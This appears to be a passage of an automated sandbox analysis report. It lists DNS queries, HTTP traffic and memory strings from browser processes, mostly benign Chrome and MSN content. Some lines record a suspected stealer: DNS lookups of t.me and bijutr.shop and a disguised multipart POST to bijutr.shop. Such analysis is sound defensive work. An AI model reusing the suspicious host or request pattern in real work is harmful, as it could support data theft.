                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734970511306&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=07175bb318f0456c974d87721f0f67b4&activityId=07175bb318f0456c974d87721f0f67b4&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=6E60CE8AF10C41EC8044A9E776F1DAF3&MUID=264DEDAF8CF36A9502DCF8F18D816BBC HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=264DEDAF8CF36A9502DCF8F18D816BBC; _EDGE_S=F=1&SID=30813E37DA7360903ECD2B69DBF8612D; _EDGE_V=1; SM=T
                Source: 42041a10-9e0c-4b44-a6ec-0f1b7f34d474.tmp.22.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: 000003.log6.22.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log6.22.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log6.22.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000003.2561263807.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561191155.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561338828.000047E4003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000011.00000003.2561263807.000047E400F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561191155.000047E400FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2561338828.000047E4003B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2640291471.000047E4006AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000011.00000002.2638622459.000047E4002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: jwpLqUxchOHCiOIbIyqhmtbx.jwpLqUxchOHCiOIbIyqhmtbx
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: global trafficDNS traffic detected: DNS query: deff.nelreports.net
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ZM790RIWTRQIE37YCBIMUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2637078288.000047E400013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2639001052.000047E40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 00000011.00000002.2639001052.000047E40040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551e2
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640537830.000047E400740000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2640417345.000047E4006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2706167310.00005B8002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061-
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 00000011.00000002.2640930970.000047E40081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658e
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2706167310.00005B8002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2706167310.00005B8002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048-
                Source: chrome.exe, 00000011.00000002.2642467846.000047E400C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559150595.000047E400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2559182034.000047E400DB0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2701244390.00005B800257C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
